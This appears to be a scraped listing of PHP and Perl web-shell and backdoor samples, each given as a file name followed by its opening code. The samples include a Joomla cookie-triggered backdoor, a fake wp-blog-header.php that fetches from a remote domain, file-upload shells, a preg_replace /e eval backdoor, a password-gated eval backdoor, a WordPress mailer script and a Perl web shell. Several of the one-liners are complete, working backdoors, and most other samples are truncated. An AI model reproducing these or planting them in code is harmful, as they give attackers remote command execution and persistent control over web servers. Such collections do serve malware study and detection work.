View _input__test.php.
<?php
/**
* @package Joomla.Plugin.System
* @since 1.5
*
*
*/
class PluginJoomla {
public function __construct() {
$jq = @$_COOKIE['ContentJQ3'];
View wp-blog-header.php
<?php @error_reporting(0);
define('cdomainDosNZ', "ssl-backup24.com");
define('showop_phpDosNZ', "showop_click.php");
define('info_phpDosNZ', 'info.php');
if (array_key_exists('HTTP_TEST', $_SERVER)) {
echo (md5("TEST2016_CLICK"));
exit;
}
function fetch_urlDosNZ($url, $data) {
$content = '';
View file-upload.php
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
View php-preg-replace-backdoor.php
<?php @preg_replace('/(.*)/e', @$_POST['cgrycynqatjstuh'], '');
View PHP-cookie-backdoor.php
View web-backdoor.php
<?php
eval("if(isset(\$_REQUEST['ch']) && (md5(\$_REQUEST['ch']) == '5d5780065f278a2db819916c4b525671') && isset(\$_REQUEST['php_code'])) { eval(\$_REQUEST['php_code']); exit(); }")%
View php-upload.php
<?php
ini_set('display_errors','Off');
error_reporting('E_ALL');
$multipart = "236c985403e7e1";
$part = "450be30e0288de41b6";
if (md5($_POST['multipart'])==$multipart.$part){
echo '
<div align="left">
<font size="1">:</font>
</div>
View php-backdoor.php
<?php
function is_valid_url(&$url)
{
if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m))
return false;
$url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6];
return true;
}
View wp-mailer-malware.php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
if(isset($_SERVER))
{
$_SERVER['PHP_SELF'] = "/";
$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
View cgi.pl
#!/usr/bin/perl
#PPS 3.0 shell by Pashkela [RDOT.ORG] © 2012
$Password="bb09c55983ff49f3a9cdfd83f08e5689";# root
$CommandTimeoutDuration=30;# max time of command execution
$tab='<table>';$tbb="<table width=100%";$verd="<font face=Verdana size=1>";$tabe='</table>';$div='<div class=content><pre class=ml1>';$dive='</pre></div>';use Digest::MD5 qw(md5_hex
);$WinNT=0;$NTCmdSep="&";$UnixCmdSep=";";$ShowDynamicOutput=1;$CmdSep=($WinNT?$NTCmdSep:$UnixCmdSep);$CmdPwd=($WinNT?"cd":"pwd");$PathSep=($WinNT?"\\":"/");$Redirector=($WinNT?" 2>&
1 1>&2":" 1>&1 2>&1");$LogFlag=false;use File::Basename;use MIME::Base64;my @last:shared;sub cod($){my $url=~s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$url=encode_base64($_[0]);return
$url;}sub dec($){ my $url1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in)=@_ if @_;local($i,$loc,$key,$val);$MultipartFormData=$ENV{'CONTENT_TYPE'}=~/multipart\/form
-data; boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_STRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST")